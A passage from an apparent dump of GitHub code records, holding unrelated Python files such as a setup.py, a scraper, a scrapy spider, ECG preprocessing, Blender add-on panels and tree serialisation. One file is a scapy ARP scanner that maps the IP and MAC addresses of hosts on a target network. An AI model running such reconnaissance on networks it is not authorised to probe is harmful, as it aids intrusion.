author=\"Jeff Forcier\",\n author_email=\"jeff@bitprophet.org\",\n url=\"https://github.com/bitprophet/releases\",\n project_urls={\n \"Docs\": \"https://releases.readthedocs.io\",\n \"Source\": \"https://github.com/bitprophet/releases\",\n \"Changelog\": \"https://releases.readthedocs.io/en/latest/changelog.html\", # noqa\n \"CI\": \"https://app.circleci.com/pipelines/github/bitprophet/releases\",\n },\n packages=[\"releases\"],\n install_requires=[\n # We mostly still work on Sphinx>=1.8, but a number of transitive\n # dependencies do not, and trying to square that circle is definitely\n # not worth the effort at this time. PRs that can pass the entire test\n # matrix are welcome, if you disagree!\n \"sphinx>=4\",\n # Continuing to pin an old semantic_version until I have time to update\n # and finish the branch I made for\n # https://github.com/bitprophet/releases/pull/86#issuecomment-580037996\n \"semantic_version<2.7\",\n ],\n python_requires=\">=3.6\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Unix\",\n \"Operating System :: POSIX\",\n \"Operating System :: Microsoft :: Windows\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Topic :: Software Development\",\n \"Topic :: Software Development :: Documentation\",\n \"Topic :: Documentation\",\n \"Topic :: Documentation :: Sphinx\",\n ],\n)\n","repo_name":"bitprophet/releases","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"32"} +{"seq_id":"10120991192","text":"# -*- coding: iso-8859-15 -*-\n\nimport cv2\nimport time\n\n\n# Exibir imagem e ajustar tamanho da janela\ndef exibir_imagem(nome, imagem, duracao=0):\n cv2.namedWindow(nome, cv2.WINDOW_NORMAL)\n cv2.resizeWindow(nome, imagem.shape[1], imagem.shape[0])\n cv2.imshow(nome, imagem)\n\n # Aguardar\n if duracao:\n cv2.waitKey(5)\n time.sleep(duracao)\n else:\n cv2.waitKey(0)\n\n\n# Fechar imagem\ndef fechar_imagem(nome):\n cv2.destroyWindow(nome)\n\n\ndef fechar_imagens():\n cv2.destroyAllWindows()\n","repo_name":"VCampanari/PDI","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27448026230","text":"#!/usr/bin/env python\n\nfrom scapy import all as scapy\nimport optparse\n\ndef get_arguments():\n parser = optparse.OptionParser()\n parser.add_option(\"-t\", \"--target_ip\", dest=\"target_ip\", help=\"Target IP for which to find its MAC address\")\n parser.add_option(\"-m\", \"--mask\", dest=\"mask\", help=\"Network mask for IP\")\n (options, arguments) = parser.parse_args()\n \n if not options.target_ip:\n parser.error(\"[-] Please specify an IP address, use --help for more info\")\n if not options.mask:\n return options.target_ip\n \n return options.target_ip + \"/\" + options.mask\n\n\ndef scan(ip):\n arp_request = scapy.ARP(pdst=ip)\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp_req_broadcast = broadcast/arp_request\n answered_list = scapy.srp(arp_req_broadcast, timeout=1, verbose=False)[0]\n \n target_clients = []\n\n for target in answered_list:\n target_clients.append({\"mac\": target[1].hwsrc, \"ip\": target[1].psrc})\n\n return target_clients\n\ndef print_results(targets_list):\n print(\"_________________________________________\\n\")\n print(\"IP\\t\\t\\tMAC ADDRESS\")\n print(\"_________________________________________\\n\")\n\n for target in targets_list:\n print(f\"{target['ip']}\\t\\t{target['mac']}\")\n print(\"\\n\") \n\ntarget_ip = get_arguments()\ntargets_list = scan(target_ip)\nprint_results(targets_list)\n","repo_name":"benterem/network-scanner","sub_path":"network-scanner.py","file_name":"network-scanner.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19508660700","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom xlwt import Workbook\n\na = 1\ndef find_date(url,sheet):\n\n url = 'http://search.yhd.com/c0-0/mbname-b/a82967::1107-s2-v4-p1-price-d0-f0b-m1-rt0-pid-mid0-color-size-k%E9%A5%AE%E7%94%A8%E6%B0%B4/#page=2&sort=2'\n p_r = requests.get(url)\n p_c = p_r.content\n p_soup = BeautifulSoup(p_c, 'html.parser')\n all = p_soup.find_all('div', {'class': 'mod_search_pro'})\n print(len(all))\n global a\n for item in all:\n item_dic = {}\n title = item.find('p', {'class': 'proName clearfix'}).find('a').get('title')\n price = item.find('em', {'class': 'num'}).text\n num = item.find('span', {'class': 'comment'}).text\n # 第N行第0列\n sheet.write(a, 0,title)\n sheet.write(a, 1,price)\n sheet.write(a, 2, num)\n a += 1\n\n\nif __name__ == '__main__':\n urllist = []\n url1 = 'http://search.yhd.com/c0-0/mbname-b/a82967::1107-s2-v4-p1-price-d0-f0b-m1-rt0-pid-mid0-color-size-k%E9%A5%AE%E7%94%A8%E6%B0%B4/'\n url2 = 'http://search.yhd.com/c0-0/mbname-b/a82967::1107-s2-v4-p1-price-d0-f0b-m1-rt0-pid-mid0-color-size-k%E9%A5%AE%E7%94%A8%E6%B0%B4/#page=2&sort=2'\n url3 = 'http://search.yhd.com/c0-0/mbname-b/a82967::1107-s2-v4-p1-price-d0-f0b-m1-rt0-pid-mid0-color-size-k%E9%A5%AE%E7%94%A8%E6%B0%B4/#page=3&sort=2'\n urllist.append(url2)\n #urllist.append(url2)\n #urllist.append(url3)\n\n # 写入excel方法\n book = Workbook()\n sheet = book.add_sheet('onestore')\n sheet.write(0, 0, '品牌')\n sheet.write(0, 1, '价格')\n sheet.write(0, 2, '销量')\n for i in range(len(urllist)):\n find_date(urllist[i],sheet)\n\n book.save('./onestore2.xls')\n","repo_name":"Alex23shi/PythonTests","sub_path":"Others/oneStore.py","file_name":"oneStore.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70715434330","text":"import scrapy\n\nfrom scrapy.http import FormRequest\nfrom scrapy_example.items import QuoteItem\n\n\nclass QuoteSpider(scrapy.Spider):\n \n name = \"quotes\"\n page_number = 2\n start_urls = [\n # \"http://quotes.toscrape.com\"\n # \"http://quotes.toscrape.com/page/2/\"\n \"http://quotes.toscrape.com/login\"\n ]\n\n \"\"\"\n parse ex:\n title = response.css(\"title::text\").extract()\n # title = response.xpath(\"//title/text()\").extract()\n # title = response.xpath(\"//span[@class='text']/text()\").extract()\n # title = response.css(\"a\").xpath(\"@href\").extract()\n yield { \"title_text\": title }\n\n \"\"\"\n\n # def parse(self, response, **kwargs):\n # quote_items = QuoteItem()\n\n # all_div_quotes = response.css(\"div.quote\")\n # for div_quote in all_div_quotes:\n # title = div_quote.css(\"span.text::text\").extract()\n # author = div_quote.css(\"small.author::text\").extract()\n # tags = div_quote.css(\"a.tag::text\").extract()\n\n # quote_items[\"title\"] = title\n # quote_items[\"author\"] = author\n # quote_items[\"tags\"] = tags\n\n # yield quote_items\n\n # next_page = response.css(\"li.next a::attr(href)\").get()\n # if next_page is not None:\n # yield response.follow(next_page, callback=self._parse)\n\n # next_page = f\"http://quotes.toscrape.com/page/{str(QuoteSpider.page_number)}/\"\n # if QuoteSpider.page_number < 11:\n # QuoteSpider.page_number += 1\n # yield response.follow(next_page, callback=self._parse)\n\n def _parse(self, response, **kwargs):\n token = response.css(\"form input::attr(value)\").extract_first()\n return FormRequest.from_response(\n response,\n formdata={\n \"csrf_token\": token,\n \"username\": \"aasfdasf\",\n \"password\": \"sdfsgsfg\"\n },\n callback=self.start_scraping,\n )\n \n def start_scraping(self, response):\n quote_items = QuoteItem()\n\n all_div_quotes = response.css(\"div.quote\")\n for div_quote in all_div_quotes:\n title = div_quote.css(\"span.text::text\").extract()\n author = div_quote.css(\"small.author::text\").extract()\n tags = div_quote.css(\"a.tag::text\").extract()\n\n quote_items[\"title\"] = title\n quote_items[\"author\"] = author\n quote_items[\"tags\"] = tags\n\n yield quote_items\n","repo_name":"datnguyen0126/scrapy_template","sub_path":"scrapy_example/scrapy_example/spiders/quotes_spider.py","file_name":"quotes_spider.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33760915716","text":"import os\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nfrom pygame.key import name\nfrom flappy import mainFlappy\nimport multiprocessing as mp\ndef write_to_file(fileName, message, openMode = 'a'):\n f = open(fileName, openMode)\n f.write(message)\n f.close()\n\ndef evaluate_GA_dataset(version, groupSize, generateTimes, dataIndex ,playTimes = 10):\n versionStr = 'Ver' +str(version) \n datasetType = 'GA'\n readFileName = 'result/GA/'+ versionStr + '_' + datasetType + '_' + str(groupSize) + '_'+ str(generateTimes) + '_' + str(dataIndex) +'.txt'\n return mainFlappy(readFileName, playTimes)\n\ndef evaluate_RD_dataset(version, dataNum, dataIndex ,playTimes = 10):\n versionStr = 'Ver' +str(version) \n datasetType = 'randomGenerate'\n readFileName = 'result/RD/'+ versionStr + '_' + datasetType + '_' +str(dataNum)+ '_' + str(dataIndex) +'.txt'\n return mainFlappy(readFileName, playTimes)\n\ndef main():\n dataIndexNum = 10\n set_processor_num = min(mp.cpu_count(), dataIndexNum) # parallel processing\n version = 3\n ### run RD ###\n writeRDFileName = 'result/RD_evaluate_dataset.txt'\n for dataNum in [200000]:\n print(\"In RD \",dataNum)\n args = [[version, dataNum, e] for e in range(dataIndexNum)]\n pool = mp.Pool(set_processor_num)\n resultList = pool.starmap(evaluate_RD_dataset, args)\n print(resultList)\n message = str(dataNum) + '\\n'\n message += str(resultList) +'\\n'\n message += str(sum(resultList)/len(resultList)) + '\\n\\n'\n write_to_file(writeRDFileName, message)\n ### run GA ###\n writeGAFileName = 'result/GA_evaluate_dataset.txt'\n for groupSize in [200, 500, 1000]:\n for generateTimes in [50, 100]:\n if groupSize == 200 and generateTimes == 50:\n continue\n print(\"In GA \", groupSize, generateTimes)\n args = [[version, groupSize, generateTimes, e] for e in range(dataIndexNum)]\n pool = mp.Pool(set_processor_num)\n resultList = pool.starmap(evaluate_GA_dataset, args)\n print(resultList)\n message = str(groupSize) + ' ' + str(generateTimes) + '\\n'\n message += str(resultList) +'\\n'\n message += str(sum(resultList)/len(resultList)) + '\\n\\n'\n write_to_file(writeGAFileName, message)\n print(\"All run OK!\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"Ikaros1110/Solve-flappy-bird-game-problem-by-Metaheuristics-algorithm","sub_path":"evaluate_dataset.py","file_name":"evaluate_dataset.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25331050118","text":"from turtle import*\ndef draw_bar(x,y,v,w,c):\n color(c,c)\n hideturtle()\n penup()\n goto(x,y)\n pendown()\n begin_fill()\n for i in range (2): \n forward(w)\n left(90)\n forward(v)\n left(90)\n end_fill() \n##draw_bar(20,30,70,20,\"red\")\n \ndef draw_bar_chart(x,l):\n \n for i in l:\n draw_bar(x,0,i,30,\"red\")\n x+=50\nl =[50,200,150,70,25,125]\ndraw_bar_chart(20,l)\n \n","repo_name":"hiepxanh/C4E4","sub_path":"hoai linh/draw_bar_chart.py","file_name":"draw_bar_chart.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28404415559","text":"import os\n\n\nclass TreeNode:\n def __init__(self, key=None):\n self.key = key\n self.left = None\n self.right = None\n\n def get_key(self):\n return self.key\n\n def get_left(self):\n return self.left\n\n def get_right(self):\n return self.right\n\n def insert_node(self, root, key):\n to_insert = TreeNode(key)\n curr = root\n while curr:\n if curr.get_key() < key:\n if curr.right == None:\n curr.right = to_insert\n return to_insert\n curr = curr.right\n elif curr.get_key() > key:\n if curr.left == None:\n curr.left = to_insert\n return to_insert\n curr = curr.left\n return None\n\n def serialize_tree_util(self, f, node):\n if node == None:\n f.write('Null\\n')\n return \n f.write(str(node.get_key())+'\\n')\n self.serialize_tree_util(f, node.left)\n self.serialize_tree_util(f, node.right)\n \n def deserialize_tree_utils(self, f):\n key = f.readline().strip('\\n')\n if not key or 'Null' == key:\n return None\n node = TreeNode(key)\n node.left = self.deserialize_tree_utils(f)\n node.right = self.deserialize_tree_utils(f)\n return node\n\n def serialize_tree(self, file_name, root):\n with open(file_name, 'w') as f:\n self.serialize_tree_util(f, root)\n\n def deserialize_tree(self, file_name):\n with open(file_name) as f:\n return self.deserialize_tree_utils(f)\n\ndef print_tree(root):\n if root == None:\n return\n print_tree(root.get_left())\n print(root.get_key())\n print_tree(root.get_right())\n\n\n# tree = TreeNode(15)\ntree = TreeNode(7)\n# tree.insert_node(tree, 10)\ntree.insert_node(tree, 11)\ntree.insert_node(tree, -1)\ntree.insert_node(tree, 17)\ntree.insert_node(tree, 35)\n# # print_tree(tree)\n\npath = os.path.join(os.getcwd(), 'ser_tree.txt')\n# print path\ntree.serialize_tree(path, tree)\nnew_tree = tree.deserialize_tree(path)\nprint_tree(new_tree)\n\n\n","repo_name":"kohn1001/Algorithms","sub_path":"python/des_n_serialize_tree.py","file_name":"des_n_serialize_tree.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27891924649","text":"from genericpath import isdir\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os, json, pickle\nfrom scipy.signal import resample\nfrom sklearn.model_selection import train_test_split\n\ndef Cardiology_preprocess():\n basepath = r\"./data/Cardiology/\"\n fs = 200\n original_frame_length = 6000\n samples_per_frame = 256\n resampled_length = 2500\n \"\"\" Determine Number of Frames Per Original Frame \"\"\"\n nframes = original_frame_length//samples_per_frame\n samples_to_take_per_frame = samples_per_frame*nframes\n\n \"\"\" All Files in Directory \"\"\"\n files = os.listdir(basepath)\n \"\"\" Return Unique Patient Ids \"\"\"\n unique_patient_numbers = np.unique([file.split('_')[0] for file in files if not os.path.isdir(os.path.join(basepath,file))])\n\n classification = 'all' #all\n inputs = dict()\n outputs = dict()\n all_labels = []\n for patient_number in unique_patient_numbers:\n inputs[patient_number] = []\n outputs[patient_number] = []\n\n \"\"\" Load Frame Data \"\"\"\n filename = [file for file in files if patient_number in file and 'ecg' in file][0]\n f = open(os.path.join(basepath,filename),'rb')\n frame = np.fromfile(f,dtype=np.int16) #6000x1\n \n \"\"\" Load Group Label File \"\"\" \n group_label = [file for file in files if patient_number in file and 'grp' in file][0]\n with open(os.path.join(basepath,group_label)) as json_file:\n data = json.load(json_file)\n \n onsets = [episode['onset']-1 for episode in data['episodes']] #=1 for python start at 0\n offsets = [episode['offset'] for episode in data['episodes']]\n rhythms = [episode['rhythm_name'] for episode in data['episodes']]\n \n for nframe in range(nframes):\n start_sample = nframe * samples_per_frame\n end_sample = start_sample + samples_per_frame\n mini_frame = frame[start_sample:end_sample]\n for i in range(len(rhythms)):\n if onsets[i] <= start_sample < offsets[i]:\n mini_label = rhythms[i] \n if mini_label == 'AVB_TYPE2':\n mini_label = 'AVB'\n elif mini_label == 'AFL':\n mini_label = 'AFIB'\n elif mini_label == 'SUDDEN_BRADY':\n break\n \n if mini_label == 'SUDDEN_BRADY': #dont record sudden brady\n continue\n \n \"\"\" Resample Frame \"\"\"\n mini_frame = resample(mini_frame,resampled_length)\n \n \"\"\" Binarize Labels \"\"\"\n if classification == 'binary':\n if mini_label == 'NSR':\n mini_label = 0\n else:\n mini_label = 1\n \n all_labels.append(mini_label)\n inputs[patient_number].append(mini_frame)\n outputs[patient_number].append(mini_label)\n \n # \"\"\" Take Last Portion of Frame \"\"\"\n # frame = frame[-samples_to_take_per_frame:]\n # \"\"\" Reshape Frame \"\"\"\n # frames = np.reshape(frame,(-1,samples_per_frame))\n # \"\"\" Change dtype of Frame \"\"\"\n # frames = np.array(frames,dtype=float)\n # \"\"\" Return Group JSON File \"\"\"\n # \"\"\" Obtain Label from Group Label File \"\"\"\n # onset_instance = 0\n # label = data['episodes'][onset_instance]['rhythm_name']\n \n # \"\"\" Convert Into Binary Classification \"\"\"\n # if classification == 'binary':\n # if 'NSR' in label:\n # label = 0\n # else:\n # label = 1\n # labels = np.repeat(label,frames.shape[0]).tolist()\n # \n # inputs[patient_number] = frames\n # outputs[patient_number] = labels\n \n inputs[patient_number] = np.array(inputs[patient_number])\n outputs[patient_number] = np.array(outputs[patient_number])\n \"\"\" Retrieve Unique Class Names \"\"\"\n unique_labels = []\n for label in all_labels:\n if label not in unique_labels:\n unique_labels.append(label)\n \"\"\" Convert Drug Names to Labels \"\"\"\n from sklearn.preprocessing import LabelEncoder\n label_encoder = LabelEncoder()\n label_encoder.fit(unique_labels)\n for patient_number,labels in outputs.items():\n outputs[patient_number] = label_encoder.transform(labels)\n \"\"\" Make New Directory to Avoid Contamination \"\"\"\n savepath = os.path.join(basepath,'patient_data')#,'%s_classes' % classification)\n try:\n os.chdir(savepath)\n except:\n os.makedirs(savepath)\n \"\"\" Save Inputs and Labels Dicts For Splitting Later \"\"\"\n with open(os.path.join(savepath,'ecg_signal_frames_cardiology.pkl'),'wb') as f:\n pickle.dump(inputs,f)\n with open(os.path.join(savepath,'ecg_signal_arrhythmia_labels_cardiology.pkl'),'wb') as f:\n pickle.dump(outputs,f)\n\ndef load_cardiology_data():\n path = r'./data/Cardiology/'\n patientdata_path = os.path.join(path, 'patient_data')\n if os.path.isdir(patientdata_path) and len(os.listdir(patientdata_path)) == 2:\n pass\n else:\n Cardiology_preprocess()\n\n frame_path, label_path = os.path.join(patientdata_path, 'ecg_signal_frames_cardiology.pkl'), os.path.join(patientdata_path, 'ecg_signal_arrhythmia_labels_cardiology.pkl')\n f_frame, f_label = open(frame_path, 'rb'), open(label_path, 'rb')\n frame_data, label_data = pickle.load(f_frame), pickle.load(f_label)\n x, y = [], []\n for num, patient_number in enumerate(frame_data.keys()):\n if num == 5: ################ 设定样本量,一个num包含23个样本\n break\n x += frame_data[patient_number].tolist() \n y += label_data[patient_number].tolist() \n X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n X_train, X_test = pd.DataFrame({'x':X_train}), pd.DataFrame({'x':X_test})\n return X_train, y_train, X_test, y_test","repo_name":"AxeForward/TS-Project","sub_path":"code/load_data/load_cardiology.py","file_name":"load_cardiology.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10313207738","text":"class Solution:\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n pos = 0\n count = 0\n for i in range(len(nums)):\n if nums[i] == 0:\n count += 1\n else:\n nums[pos] = nums[i]\n pos += 1\n\n while count != 0:\n nums[-count] = 0\n count -= 1\n","repo_name":"aditya-chayapathy/leetcode","sub_path":"Solutions/Move_Zeros.py","file_name":"Move_Zeros.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1036944491","text":"import bpy\nfrom addon_utils import check, paths, enable\nfrom bpy.types import Panel\nfrom bpy.props import *\n\n# Module imports\nfrom ..matslot_uilist import *\nfrom ..panel_info import *\nfrom ...functions import *\n\n\nclass VIEW3D_PT_bricker_materials(BrickerPanel, Panel):\n bl_label = \"Materials\"\n bl_idname = \"VIEW3D_PT_bricker_materials\"\n bl_parent_id = \"VIEW3D_PT_bricker_model_settings\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n @classmethod\n def poll(self, context):\n if not settings_can_be_drawn():\n return False\n return True\n\n def draw(self, context):\n layout = self.layout\n scn, cm, _ = get_active_context_info()\n obj = cm.source_obj\n\n col = layout.column(align=True)\n col.prop(cm, \"material_type\", text=\"\")\n\n if cm.material_type == \"CUSTOM\":\n col = layout.column(align=True)\n col.prop(cm, \"custom_mat\", text=\"\")\n if brick_materials_installed() and not brick_materials_imported():\n col.operator(\"abs.append_materials\", text=\"Import Brick Materials\", icon=\"IMPORT\")\n if cm.model_created or cm.animated:\n col = layout.column(align=True)\n col.operator(\"bricker.apply_material\", icon=\"FILE_TICK\")\n elif cm.material_type == \"RANDOM\":\n col = layout.column(align=True)\n col.active = cm.instance_method != \"POINT_CLOUD\"\n col.prop(cm, \"random_mat_seed\")\n if cm.model_created or cm.animated:\n if cm.material_is_dirty and not cm.last_split_model:\n col = layout.column(align=True)\n col.label(text=\"Run 'Update Model' to apply changes\")\n elif cm.last_material_type == cm.material_type or (not cm.use_animation and cm.last_split_model):\n col = layout.column(align=True)\n col.operator(\"bricker.apply_material\", icon=\"FILE_TICK\")\n elif cm.material_type in \"SOURCE\" and obj:\n # internal material info\n if cm.shell_thickness > 1 or cm.internal_supports != \"NONE\":\n # if len(obj.data.uv_layers) <= 0 or len(obj.data.vertex_colors) > 0:\n col = layout.column(align=True)\n col.active = cm.instance_method != \"POINT_CLOUD\"\n col.label(text=\"Internal Material:\")\n col.prop(cm, \"internal_mat\", text=\"\")\n col.prop(cm, \"mat_shell_depth\")\n if cm.model_created:\n if cm.mat_shell_depth <= cm.last_mat_shell_depth and cm.last_split_model:\n col.operator(\"bricker.apply_material\", icon=\"FILE_TICK\")\n else:\n col.label(text=\"Run 'Update Model' to apply changes\")\n\n # color snapping info\n col = layout.column(align=True)\n col.active = cm.instance_method != \"POINT_CLOUD\"\n col.label(text=\"Color Mapping:\")\n row = col.row(align=True)\n row.prop(cm, \"color_snap\", expand=True)\n if cm.color_snap == \"RGB\":\n col.prop(cm, \"color_depth\")\n if cm.color_snap == \"ABS\":\n # col.prop(cm, \"blur_radius\")\n # col.prop(cm, \"color_depth\")\n col.prop(cm, \"transparent_weight\", text=\"Transparent Weight\")\n\n if not b280() and cm.color_snap != \"NONE\":\n col = layout.column(align=True)\n col.active = len(obj.data.uv_layers) > 0 and cm.instance_method != \"POINT_CLOUD\"\n row.prop(cm, \"use_uv_map\", text=\"Use UV Map\")\n if cm.use_uv_map:\n split = layout_split(row, factor=0.75)\n # split.active = cm.use_uv_map\n split.prop(cm, \"uv_image\", text=\"\")\n split.operator(\"image.open\", icon=\"FILEBROWSER\" if b280() else \"FILESEL\", text=\"\")\n if len(obj.data.vertex_colors) > 0:\n col = layout.column(align=True)\n col.scale_y = 0.7\n col.label(text=\"(Vertex colors not supported)\")\n\n\nclass VIEW3D_PT_bricker_use_uv_map(BrickerPanel, Panel):\n bl_label = \"Use UV Map\"\n bl_parent_id = \"VIEW3D_PT_bricker_materials\"\n bl_idname = \"VIEW3D_PT_bricker_use_uv_map\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n @classmethod\n def poll(self, context):\n if not settings_can_be_drawn() or not b280():\n return False\n scn, cm, _ = get_active_context_info()\n obj = cm.source_obj\n if cm.instance_method == \"POINT_CLOUD\":\n return False\n if obj and len(obj.data.uv_layers) > 0 and cm.material_type == \"SOURCE\" and cm.color_snap != \"NONE\":\n return True\n return False\n\n def draw_header(self, context):\n scn, cm, _ = get_active_context_info()\n self.layout.prop(cm, \"use_uv_map\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n scn, cm, _ = get_active_context_info()\n obj = cm.source_obj\n\n col = layout.column(align=True)\n row = col.row(align=True)\n row.prop(cm, \"uv_image\", text=\"Tex\")\n row.operator(\"image.open\", icon=\"FILEBROWSER\" if b280() else \"FILESEL\", text=\"\")\n\n\nclass VIEW3D_PT_bricker_included_materials(BrickerPanel, Panel):\n bl_label = \"Included Materials\"\n bl_parent_id = \"VIEW3D_PT_bricker_materials\"\n bl_idname = \"VIEW3D_PT_bricker_included_materials\"\n\n @classmethod\n def poll(self, context):\n if not settings_can_be_drawn():\n return False\n scn, cm, _ = get_active_context_info()\n # order here is important\n if cm.material_type == \"RANDOM\":\n return True\n elif cm.instance_method == \"POINT_CLOUD\":\n return False\n elif cm.material_type == \"SOURCE\" and cm.color_snap == \"ABS\":\n return True\n return False\n\n def draw(self, context):\n layout = self.layout\n scn, cm, _ = get_active_context_info()\n\n mat_obj = get_mat_obj(cm)\n if mat_obj is None:\n return\n col = layout.column(align=True)\n if not brick_materials_installed():\n col.label(text=\"'ABS Plastic Materials' not installed\")\n col.scale_y = 0.75\n col = layout.column(align=True)\n col.operator(\"wm.url_open\", text=\"View Website\", icon=\"WORLD\").url = \"http://www.blendermarket.com/products/abs-plastic-materials\"\n col.separator()\n elif scn.render.engine not in (\"CYCLES\", \"BLENDER_EEVEE\"):\n col.label(text=\"Switch to 'Cycles' or 'Eevee' for Brick Materials\")\n else:\n # draw materials UI list and list actions\n num_mats = len(mat_obj.data.materials)\n rows = 5 if num_mats > 5 else (num_mats if num_mats > 2 else 2)\n split = layout_split(col, factor=0.85)\n col1 = split.column(align=True)\n col1.template_list(\"MATERIAL_UL_matslots\", \"\", mat_obj, \"material_slots\", mat_obj, \"active_material_index\", rows=rows)\n col1 = split.column(align=True)\n col1.operator(\"bricker.mat_list_action\", icon=\"REMOVE\" if b280() else \"ZOOMOUT\", text=\"\").action = \"REMOVE\"\n col1.scale_y = 1 + rows\n if not brick_materials_imported():\n col.operator(\"abs.append_materials\", text=\"Import Brick Materials\", icon=\"IMPORT\")\n else:\n col.operator(\"bricker.add_abs_plastic_materials\", text=\"Add ABS Plastic Materials\", icon=\"ADD\" if b280() else \"ZOOMIN\")\n # settings for adding materials\n if hasattr(bpy.props, \"abs_mats_common\"): # checks that ABS plastic mats are at least v2.1\n col = layout.column(align=True)\n right_align(col)\n col.prop(scn, \"include_transparent\")\n col.prop(scn, \"include_uncommon\")\n\n col = layout.column(align=True)\n split = layout_split(col, factor=0.25)\n col = split.column(align=True)\n col.label(text=\"Add:\")\n col = split.column(align=True)\n col.prop(cm, \"target_material\", text=\"\")\n if cm.target_material_message != \"\" and time.time() - float(cm.target_material_time) < 4:\n col = layout.column(align=True)\n col.label(text=cm.target_material_message, icon=\"INFO\" if cm.target_material_message.startswith(\"Added\") else \"ERROR\")\n\n\nclass VIEW3D_PT_bricker_material_properties(BrickerPanel, Panel):\n bl_label = \"Material Properties\"\n bl_idname = \"VIEW3D_PT_bricker_material_properties\"\n bl_parent_id = \"VIEW3D_PT_bricker_materials\"\n bl_options = {\"DEFAULT_CLOSED\"}\n\n @classmethod\n def poll(self, context):\n if not settings_can_be_drawn():\n return False\n scn, cm, _ = get_active_context_info()\n obj = cm.source_obj\n if cm.instance_method == \"POINT_CLOUD\":\n return False\n if cm.material_type == \"SOURCE\" and obj:\n if cm.color_snap == \"RGB\" or (cm.use_uv_map and len(obj.data.uv_layers) > 0 and cm.color_snap == \"NONE\"):\n return True\n return False\n\n def draw(self, context):\n layout = self.layout\n scn, cm, _ = get_active_context_info()\n\n col = layout.column(align=True)\n right_align(col)\n col.prop(cm, \"use_abs_template\")\n col.enabled = brick_materials_installed()\n\n if not (cm.use_abs_template and brick_materials_installed()):\n obj = cm.source_obj\n if scn.render.engine in (\"CYCLES\", \"BLENDER_EEVEE\", \"octane\"):\n col = layout.column(align=True)\n col.prop(cm, \"color_snap_specular\")\n col.prop(cm, \"color_snap_roughness\")\n col.prop(cm, \"color_snap_ior\")\n if scn.render.engine in (\"CYCLES\", \"BLENDER_EEVEE\"):\n col.prop(cm, \"color_snap_sss\")\n col.prop(cm, \"color_snap_sss_saturation\")\n col.prop(cm, \"color_snap_transmission\")\n if scn.render.engine in (\"CYCLES\", \"BLENDER_EEVEE\", \"octane\"):\n col = layout.column(align=True)\n right_align(col)\n col.prop(cm, \"include_transparency\")\n elif brick_materials_installed():\n col = layout.column(align=True)\n col.prop(cm, \"color_snap_sss\")\n col.prop(cm, \"color_snap_displacement\")\n col = layout.column(align=True)\n right_align(col)\n col.prop(cm, \"include_transparency\")\n","repo_name":"feureau/Small-Scripts","sub_path":"Blender/Blender config/2.91/scripts/addons/bricker_v2-2-1/ui/view_3d/materials.py","file_name":"materials.py","file_ext":"py","file_size_in_byte":10606,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"24138320167","text":"import argparse\nimport os\nimport sys\n\ndef main():\n \"\"\"Iterate over a series of configurations and run benchmarks for each of the specified\n queries using that configuration.\n\n Example usage:\n\n python benchmark.py \\\n --template /path/to/template \\\n --benchmark tpcds \\\n --input /path/to/input \\\n --input-format parquet \\\n --output /path/to/output \\\n --output-format parquet \\\n --configs cpu gpu-ucx-on \\\n --query q4 q5\n\n In this example, configuration key-value pairs will be loaded from cpu.properties and\n gpu-ucx-on.properties and appended to a spark-submit-template.txt to build the spark-submit\n commands to run the benchmark. These configuration property files simply contain key-value\n pairs in the format key=value with one pair per line. For example:\n\n spark.executor.cores=2\n spark.rapids.sql.enabled=true\n spark.sql.adaptive.enabled=true\n\n A template file must be provided, containing the command to call spark-submit along\n with any cluster-specific configuration options and any spark configuration settings that\n will be common to all benchmark runs. The template should end with a line-continuation\n symbol since additional --conf options will be appended for each benchmark run.\n\n Example template:\n\n $SPARK_HOME/bin/spark-submit \\\n --master $SPARK_MASTER_URL \\\n --conf spark.plugins=com.nvidia.spark.SQLPlugin \\\n --conf spark.eventLog.enabled=true \\\n --conf spark.eventLog.dir=./spark-event-logs \\\n\n The output and 